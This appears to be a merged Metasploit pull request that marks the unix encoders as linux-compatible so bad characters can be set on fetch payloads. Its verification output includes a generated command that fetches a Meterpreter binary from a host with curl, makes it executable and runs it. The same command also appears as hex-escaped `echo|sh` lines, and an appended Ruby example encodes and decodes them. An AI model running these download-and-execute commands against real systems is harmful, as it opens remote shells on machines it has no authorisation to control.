
Mark unix encoders as compatible with linux #18720

Merged
merged 1 commit into from Jan 23, 2024

Conversation

zeroSteiner
Contributor

Fixes #18572 by marking the existing unix encoders as also being compatible with linux. There are currently no encoder modules that are marked as compatible with linux so when an exploit author intends to use the new fetch payloads, they can't set the bad characters in the payload hash of the module.

Verification

  • Start msfconsole
  • use payload/cmd/linux/http/x64/meterpreter/reverse_tcp or one of the other linux payload modules
  • Generate the payload with at least one bad character and see that an encoder is automatically selected and used instead of receiving an error

New and fixed

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
/bin/echo${IFS}-ne${IFS}'\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x39\x2e\x31\x32\x38\x3a\x38\x30\x38\x30\x2f\x6a\x76\x45\x5f\x67\x6a\x44\x4b\x78\x75\x51\x6f\x38\x36\x2d\x39\x31\x54\x69\x74\x4e\x51\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x3b\x20\x2f\x74\x6d\x70\x2f\x77\x69\x53\x74\x45\x48\x47\x68\x7a\x76\x70\x20\x26'|sh

Old and broken

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
[-] Payload generation failed: cmd/linux/http/x64/meterpreter/reverse_tcp: All encoders failed to encode.

@bwatters-r7 bwatters-r7 self-assigned this Jan 22, 2024
@bwatters-r7
Contributor

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      WCQjNFZajXcu     no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
curl -so /tmp/WCQjNFZajXcu http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/WCQjNFZajXcu; /tmp/WCQjNFZajXcu &
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw -b '\x20'
/bin/echo${IFS}-ne${IFS}'\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x57\x43\x51\x6a\x4e\x46\x5a\x61\x6a\x58\x63\x75\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x35\x2e\x31\x33\x35\x2e\x32\x30\x31\x3a\x38\x30\x38\x30\x2f\x76\x33\x76\x5a\x78\x52\x33\x50\x2d\x73\x74\x75\x4b\x57\x6a\x55\x65\x36\x70\x43\x65\x41\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x57\x43\x51\x6a\x4e\x46\x5a\x61\x6a\x58\x63\x75\x3b\x20\x2f\x74\x6d\x70\x2f\x57\x43\x51\x6a\x4e\x46\x5a\x61\x6a\x58\x63\x75\x20\x26'|sh
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
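To make the before/after output above checkable outside msfconsole, here is an added Ruby example (not Metasploit's own encoder module): it reproduces the `/bin/echo${IFS}-ne '\x..'|sh` wrapping the selected encoder emitted, reports which bad characters remain in a line, and decodes a captured line of that shape back to the plain command, which is the view an analyst reviewing such a line wants. The sample command is the one from the comment above; the function names are this example's own.

```ruby
# Added example, not Metasploit's encoder code: hex-escape a shell command the
# way the output above shows, verify the bad-character constraint, and decode.

# Byte-wise \xNN escape of the command; ${IFS} stands in for the spaces of the
# wrapper itself so the whole line contains no 0x20 byte.
def encode_sh_cmd(cmd)
  hex = cmd.bytes.map { |b| format('\\x%02x', b) }.join
  "/bin/echo${IFS}-ne${IFS}'#{hex}'|sh"
end

# Bad characters that still occur in a line (empty array when the encoding
# satisfied the constraint, which is what "generate -b" checks for).
def badchars_present(line, badchars)
  badchars.chars.select { |c| line.include?(c) }
end

# Shape of an encoded line; anything else is reported as nil by the decoder.
ENCODED_RE = %r{\A/bin/echo\$\{IFS\}-ne\$\{IFS\}'((?:\\x[0-9a-fA-F]{2})+)'\|sh\z}

# Inverse of encode_sh_cmd: recover the plain command from a captured line.
def decode_sh_cmd(line)
  m = ENCODED_RE.match(line.strip)
  return nil unless m
  m[1].scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }.pack('C*')
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: the plain fetch command shown in the comment above.
  plain = 'curl -so /tmp/WCQjNFZajXcu http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; ' \
          'chmod +x /tmp/WCQjNFZajXcu; /tmp/WCQjNFZajXcu &'
  enc = encode_sh_cmd(plain)
  puts enc
  puts "bad chars before: #{badchars_present(plain, ' ').inspect}"
  puts "bad chars after:  #{badchars_present(enc, ' ').inspect}"
  puts "round trip ok: #{decode_sh_cmd(enc) == plain}"
end
```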

@bwatters-r7 bwatters-r7 merged commit 583d39b into rapid7:master Jan 23, 2024
57 checks passed
@bwatters-r7
Contributor

Release Notes

This enhancement marks the existing unix encoders as also being compatible with linux. Previously, no encoder modules were marked as compatible with linux, so users could not set bad characters when using the new fetch payloads.

@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jan 23, 2024
Labels
rn-enhancement release notes enhancement
Development

Successfully merging this pull request may close these issues.

Not able to find a proper encoder with Fetch Payloads
2 participants